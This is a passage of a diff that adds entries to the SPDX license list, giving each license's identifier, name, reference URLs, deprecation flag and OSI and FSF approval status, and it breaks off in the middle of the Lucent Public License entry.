+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.2.json",
+ "referenceNumber": 56,
+ "name": "LaTeX Project Public License v1.2",
+ "licenseId": "LPPL-1.2",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-94.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-94.json",
+ "referenceNumber": 57,
+ "name": "Spencer License 94",
+ "licenseId": "Spencer-94",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.2.json",
+ "referenceNumber": 58,
+ "name": "Open LDAP Public License v1.2",
+ "licenseId": "OLDAP-1.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d42b0383c50c299977b5893ee695cf4e486fb0dc7"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/O-UDA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/O-UDA-1.0.json",
+ "referenceNumber": 59,
+ "name": "Open Use of Data Agreement v1.0",
+ "licenseId": "O-UDA-1.0",
+ "seeAlso": [
+ "https://github.com/microsoft/Open-Use-of-Data-Agreement/blob/v1.0/O-UDA-1.0.md",
+ "https://cdla.dev/open-use-of-data-agreement-v1-0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.7.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.7.json",
+ "referenceNumber": 60,
+ "name": "Open LDAP Public License v2.7",
+ "licenseId": "OLDAP-2.7",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d47c2415c1df81556eeb39be6cad458ef87c534a2"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Glulxe.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Glulxe.json",
+ "referenceNumber": 61,
+ "name": "Glulxe License",
+ "licenseId": "Glulxe",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Glulxe"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/iMatix.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/iMatix.json",
+ "referenceNumber": 62,
+ "name": "iMatix Standard Function Library Agreement",
+ "licenseId": "iMatix",
+ "seeAlso": [
+ "http://legacy.imatix.com/html/sfl/sfl4.htm#license"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TAPR-OHL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TAPR-OHL-1.0.json",
+ "referenceNumber": 63,
+ "name": "TAPR Open Hardware License v1.0",
+ "licenseId": "TAPR-OHL-1.0",
+ "seeAlso": [
+ "https://www.tapr.org/OHL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NBPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NBPL-1.0.json",
+ "referenceNumber": 64,
+ "name": "Net Boolean Public License v1",
+ "licenseId": "NBPL-1.0",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d37b4b3f6cc4bf34e1d3dec61e69914b9819d8894"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-R-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-R-1.1.json",
+ "referenceNumber": 65,
+ "name": "Licence Libre du Québec – Réciprocité version 1.1",
+ "licenseId": "LiLiQ-R-1.1",
+ "seeAlso": [
+ "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-liliq-r-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-R-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Noweb.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Noweb.json",
+ "referenceNumber": 66,
+ "name": "Noweb License",
+ "licenseId": "Noweb",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Noweb"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC0-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC0-1.0.json",
+ "referenceNumber": 67,
+ "name": "Creative Commons Zero v1.0 Universal",
+ "licenseId": "CC0-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/publicdomain/zero/1.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-Protection.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-Protection.json",
+ "referenceNumber": 68,
+ "name": "BSD Protection License",
+ "licenseId": "BSD-Protection",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD_Protection_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.5.json",
+ "referenceNumber": 69,
+ "name": "Creative Commons Attribution Non Commercial 2.5 Generic",
+ "licenseId": "CC-BY-NC-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zlib.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zlib.json",
+ "referenceNumber": 70,
+ "name": "zlib License",
+ "licenseId": "Zlib",
+ "seeAlso": [
+ "http://www.zlib.net/zlib_license.html",
+ "https://opensource.org/licenses/Zlib"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.json",
+ "referenceNumber": 71,
+ "name": "GNU Free Documentation License v1.3 or later - invariants",
+ "licenseId": "GFDL-1.3-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-AT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-AT.json",
+ "referenceNumber": 72,
+ "name": "Creative Commons Attribution 3.0 Austria",
+ "licenseId": "CC-BY-3.0-AT",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/at/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.3c.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.3c.json",
+ "referenceNumber": 73,
+ "name": "LaTeX Project Public License v1.3c",
+ "licenseId": "LPPL-1.3c",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-3c.txt",
+ "https://opensource.org/licenses/LPPL-1.3c"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPL-1.0.json",
+ "referenceNumber": 74,
+ "name": "Eclipse Public License 1.0",
+ "licenseId": "EPL-1.0",
+ "seeAlso": [
+ "http://www.eclipse.org/legal/epl-v10.html",
+ "https://opensource.org/licenses/EPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.json",
+ "referenceNumber": 75,
+ "name": "GNU Free Documentation License v1.1 or later - invariants",
+ "licenseId": "GFDL-1.1-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ANTLR-PD-fallback.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ANTLR-PD-fallback.json",
+ "referenceNumber": 76,
+ "name": "ANTLR Software Rights Notice with license fallback",
+ "licenseId": "ANTLR-PD-fallback",
+ "seeAlso": [
+ "http://www.antlr2.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.4.json",
+ "referenceNumber": 77,
+ "name": "Open LDAP Public License v2.4",
+ "licenseId": "OLDAP-2.4",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcd1284c4a91a8a380d904eee68d1583f989ed386"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.3.json",
+ "referenceNumber": 78,
+ "name": "Open LDAP Public License v2.3",
+ "licenseId": "OLDAP-2.3",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dd32cf54a32d581ab475d23c810b0a7fbaf8d63c3"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-2.1.json",
+ "referenceNumber": 79,
+ "name": "Zope Public License 2.1",
+ "licenseId": "ZPL-2.1",
+ "seeAlso": [
+ "http://old.zope.org/Resources/ZPL/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-2.0.json",
+ "referenceNumber": 80,
+ "name": "Apache License 2.0",
+ "licenseId": "Apache-2.0",
+ "seeAlso": [
+ "https://www.apache.org/licenses/LICENSE-2.0",
+ "https://opensource.org/licenses/Apache-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-2.0.json",
+ "referenceNumber": 81,
+ "name": "SGI Free Software License B v2.0",
+ "licenseId": "SGI-B-2.0",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.2.0.pdf"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Hippocratic-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Hippocratic-2.1.json",
+ "referenceNumber": 82,
+ "name": "Hippocratic License 2.1",
+ "licenseId": "Hippocratic-2.1",
+ "seeAlso": [
+ "https://firstdonoharm.dev/version/2/1/license.html",
+ "https://github.com/EthicalSource/hippocratic-license/blob/58c0e646d64ff6fbee275bfe2b9492f914e3ab2a/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.json",
+ "referenceNumber": 83,
+ "name": "Creative Commons Attribution Share Alike 3.0 Germany",
+ "licenseId": "CC-BY-SA-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.json",
+ "referenceNumber": 84,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 1.0 Generic",
+ "licenseId": "CC-BY-NC-SA-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-or-later.json",
+ "referenceNumber": 85,
+ "name": "GNU Lesser General Public License v2.1 or later",
+ "licenseId": "LGPL-2.1-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-US.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-US.json",
+ "referenceNumber": 86,
+ "name": "Creative Commons Attribution 3.0 United States",
+ "licenseId": "CC-BY-3.0-US",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/us/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TCP-wrappers.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TCP-wrappers.json",
+ "referenceNumber": 87,
+ "name": "TCP Wrappers License",
+ "licenseId": "TCP-wrappers",
+ "seeAlso": [
+ "http://rc.quest.com/topics/openssh/license.php#tcpwrappers"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.json",
+ "referenceNumber": 88,
+ "name": "GNU Free Documentation License v1.2 or later - invariants",
+ "licenseId": "GFDL-1.2-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Eurosym.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Eurosym.json",
+ "referenceNumber": 89,
+ "name": "Eurosym License",
+ "licenseId": "Eurosym",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Eurosym"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1.json",
+ "referenceNumber": 90,
+ "name": "GNU Free Documentation License v1.1",
+ "licenseId": "GFDL-1.1",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.0.json",
+ "referenceNumber": 91,
+ "name": "LaTeX Project Public License v1.0",
+ "licenseId": "LPPL-1.0",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-0.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0+.json",
+ "referenceNumber": 92,
+ "name": "GNU Library General Public License v2 or later",
+ "licenseId": "LGPL-2.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-1.0.json",
+ "referenceNumber": 93,
+ "name": "SGI Free Software License B v1.0",
+ "licenseId": "SGI-B-1.0",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.1.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APL-1.0.json",
+ "referenceNumber": 94,
+ "name": "Adaptive Public License 1.0",
+ "licenseId": "APL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/APL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/libtiff.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libtiff.json",
+ "referenceNumber": 95,
+ "name": "libtiff License",
+ "licenseId": "libtiff",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/libtiff"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-2.1.json",
+ "referenceNumber": 96,
+ "name": "Academic Free License v2.1",
+ "licenseId": "AFL-2.1",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-2.1.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-1.0.json",
+ "referenceNumber": 97,
+ "name": "Creative Commons Attribution Non Commercial 1.0 Generic",
+ "licenseId": "CC-BY-NC-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GD.json",
+ "referenceNumber": 98,
+ "name": "GD License",
+ "licenseId": "GD",
+ "seeAlso": [
+ "https://libgd.github.io/manuals/2.3.0/files/license-txt.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-1.1.json",
+ "referenceNumber": 99,
+ "name": "Academic Free License v1.1",
+ "licenseId": "AFL-1.1",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-1.1.txt",
+ "http://wayback.archive.org/web/20021004124254/http://www.opensource.org/licenses/academic.php"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.json",
+ "referenceNumber": 100,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 IGO",
+ "licenseId": "CC-BY-NC-ND-3.0-IGO",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/igo/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-DFS-2015.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2015.json",
+ "referenceNumber": 101,
+ "name": "Unicode License Agreement - Data Files and Software (2015)",
+ "licenseId": "Unicode-DFS-2015",
+ "seeAlso": [
+ "https://web.archive.org/web/20151224134844/http://unicode.org/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-only.json",
+ "referenceNumber": 102,
+ "name": "GNU Free Documentation License v1.2 only",
+ "licenseId": "GFDL-1.2-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-1.1.json",
+ "referenceNumber": 103,
+ "name": "Mozilla Public License 1.1",
+ "licenseId": "MPL-1.1",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/MPL-1.1.html",
+ "https://opensource.org/licenses/MPL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-only.json",
+ "referenceNumber": 104,
+ "name": "GNU General Public License v2.0 only",
+ "licenseId": "GPL-2.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-4.0.json",
+ "referenceNumber": 105,
+ "name": "Creative Commons Attribution Non Commercial 4.0 International",
+ "licenseId": "CC-BY-NC-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FreeImage.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FreeImage.json",
+ "referenceNumber": 106,
+ "name": "FreeImage Public License v1.0",
+ "licenseId": "FreeImage",
+ "seeAlso": [
+ "http://freeimage.sourceforge.net/freeimage-license.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SHL-0.51.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SHL-0.51.json",
+ "referenceNumber": 107,
+ "name": "Solderpad Hardware License, Version 0.51",
+ "licenseId": "SHL-0.51",
+ "seeAlso": [
+ "https://solderpad.org/licenses/SHL-0.51/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Jython.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Jython.json",
+ "referenceNumber": 108,
+ "name": "CNRI Jython License",
+ "licenseId": "CNRI-Jython",
+ "seeAlso": [
+ "http://www.jython.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-1.1.json",
+ "referenceNumber": 109,
+ "name": "Zope Public License 1.1",
+ "licenseId": "ZPL-1.1",
+ "seeAlso": [
+ "http://old.zope.org/Resources/License/ZPL-1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Afmparse.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Afmparse.json",
+ "referenceNumber": 110,
+ "name": "Afmparse License",
+ "licenseId": "Afmparse",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Afmparse"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.1.json",
+ "referenceNumber": 111,
+ "name": "Open LDAP Public License v2.1",
+ "licenseId": "OLDAP-2.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db0d176738e96a0d3b9f85cb51e140a86f21be715"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Rdisc.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Rdisc.json",
+ "referenceNumber": 112,
+ "name": "Rdisc License",
+ "licenseId": "Rdisc",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Rdisc_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Imlib2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Imlib2.json",
+ "referenceNumber": 113,
+ "name": "Imlib2 License",
+ "licenseId": "Imlib2",
+ "seeAlso": [
+ "http://trac.enlightenment.org/e/browser/trunk/imlib2/COPYING",
+ "https://git.enlightenment.org/legacy/imlib2.git/tree/COPYING"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause-Shortened.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-Shortened.json",
+ "referenceNumber": 114,
+ "name": "BSD 4 Clause Shortened",
+ "licenseId": "BSD-4-Clause-Shortened",
+ "seeAlso": [
+ "https://metadata.ftp-master.debian.org/changelogs//main/a/arpwatch/arpwatch_2.1a15-7_copyright"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sendmail.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sendmail.json",
+ "referenceNumber": 115,
+ "name": "Sendmail License",
+ "licenseId": "Sendmail",
+ "seeAlso": [
+ "http://www.sendmail.com/pdfs/open_source/sendmail_license.pdf",
+ "https://web.archive.org/web/20160322142305/https://www.sendmail.com/pdfs/open_source/sendmail_license.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5.json",
+ "referenceNumber": 116,
+ "name": "Creative Commons Attribution 2.5 Generic",
+ "licenseId": "CC-BY-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AAL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AAL.json",
+ "referenceNumber": 117,
+ "name": "Attribution Assurance License",
+ "licenseId": "AAL",
+ "seeAlso": [
+ "https://opensource.org/licenses/attribution"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.json",
+ "referenceNumber": 118,
+ "name": "Mozilla Public License 2.0 (no copyleft exception)",
+ "licenseId": "MPL-2.0-no-copyleft-exception",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/2.0/",
+ "https://opensource.org/licenses/MPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.json",
+ "referenceNumber": 119,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 2.5 Generic",
+ "licenseId": "CC-BY-NC-ND-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-NL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-NL.json",
+ "referenceNumber": 120,
+ "name": "Creative Commons Attribution 3.0 Netherlands",
+ "licenseId": "CC-BY-3.0-NL",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/nl/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPL-1.02.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPL-1.02.json",
+ "referenceNumber": 121,
+ "name": "Lucent Public License v1.02",
+ "licenseId": "LPL-1.02",
+ "seeAlso": [
